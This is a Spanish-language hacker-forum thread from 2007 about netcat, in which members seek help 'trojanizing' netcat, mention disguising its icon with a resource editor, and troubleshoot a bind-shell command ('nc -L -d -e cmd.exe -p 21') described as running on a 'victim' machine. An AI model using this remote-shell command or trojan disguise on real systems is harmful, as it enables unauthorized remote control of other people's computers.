Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 4 Visitantes están viendo este tema.

lethalshot

hola amigos, si alguien me pudiera ayudar para poder troyanizar al netcat.
si bien lo he encontrado en http://foro.elhacker.net/index.php/topic,159799.0.html, pero no salen las imágenes. gracias de antemano y estaré atento a su respuesta

WannaBeHacker

Cita de: lethalshot en  9 Noviembre 2007, 11:31 AM
hola amigos, si alguien me pudiera ayudar para poder troyanizar al netcat.
si bien lo he encontrado en http://foro.elhacker.net/index.php/topic,159799.0.html, pero no salen las imágenes. gracias de antemano y estaré atento a su respuesta

http://512.iespana.es/?page_id=7

Saludos

lethalshot

gracias WannaBeHacker  por tomarte tu tiempo. ahora sí tengo las herramientas para troyanizar mi netcat..
                                          saludos


softdates

alguien sabe porque al conectarme por shell directa con nc -L -d -e cmd.exe -p 21
me conecta me sale puerto abierto pero demora una eternidad aparte que a veces se cuelga y salen simbolos extraños durante la conexión cabe mencionar que las dos maquinas con wind 98 SE y no tienen internet es un red interna en el trabajo.

D4RIO

cuando pones nc y usas el modificador -L no estás haciendo una conexión, solamente estás poniento el puerto que especifiques a la escucha. Se quedará a la escucha hasta que la otra shell ejecute la conexión con tu máquina por el puerto abierto.

En el caso podés usar simplemente "nc numero_ip 21" desde la otra shell y tenés la conexión.

No tiene porqué tardar...yo hice conexiónes a shells remotas y la conexión es casi inmediata...y eso que las hice en la "gran red"...
OpenBSDFreeBSD

softdates

D4RIO quiese decir en la maquina victima esta nc -L -d -e cmd.exe -p 21

y yo me conecto con la ip ejemplo nc 10.10.42.43 21 pero demora un chorro en conectarse para luego cerrarse por hay mismo.

indico las maquinas son wind 98 se

D4RIO

#336
Entonces tu problema debe ser un firewall, lo extraño es que no te diga que te deniega la conexión. Conectando de Linux a Linux no me tarda nada...

Intentá hacer un ping a la ip para ver si el problema está en la conexión (o el número de ip), o si netcat está siendo "inhibido" por otra cosa.
OpenBSDFreeBSD

BaKuRiUM

Cita de: Novlucker en 27 Marzo 2007, 14:56 PM
El problema lo estan teniendo a la hora de crear el ejecutable con el reshacker, ya que lo que se propone es cambiar el icono del nc, pero eso a veces da problemas, prueben crear el archivo final, pero sin cambiar el icono del nc, probablemente sea ese el problema

salu2


hola  bueno soy nuevo en este sitio y quisiera tomar cursos de CyC++ bueno ahora estoy aprendiena a manejar C#, pero yo quisiera manejar  c++, no se si me pudiera ayuudar. si me pueden dar manuales, etc. les agradeceria bastante ;) ;D
Sistemas Lo Mejor.. xD

WannaBeHacker

Cita de: BaKuRiUM en 13 Noviembre 2007, 15:16 PM
hola  bueno soy nuevo en este sitio y quisiera tomar cursos de CyC++ bueno ahora estoy aprendiena a manejar C#, pero yo quisiera manejar  c++, no se si me pudiera ayuudar. si me pueden dar manuales, etc. les agradeceria bastante ;) ;D

NO es el post adecuado para preguntarlo, ¿a qué viene eso?

D4RIO

Tomar cursos?????   ;D  -- Cuando yo me dispuse a aprenderlo me trague una Enciclopedia de C++ de una biblioteca y me baje unos 10 manuales de internet....

EL CONOCIMIENTO NO VIENE POR OSMOSIS!!! - SE ADQUIERE CON ESFUERZO · · ·
OpenBSDFreeBSD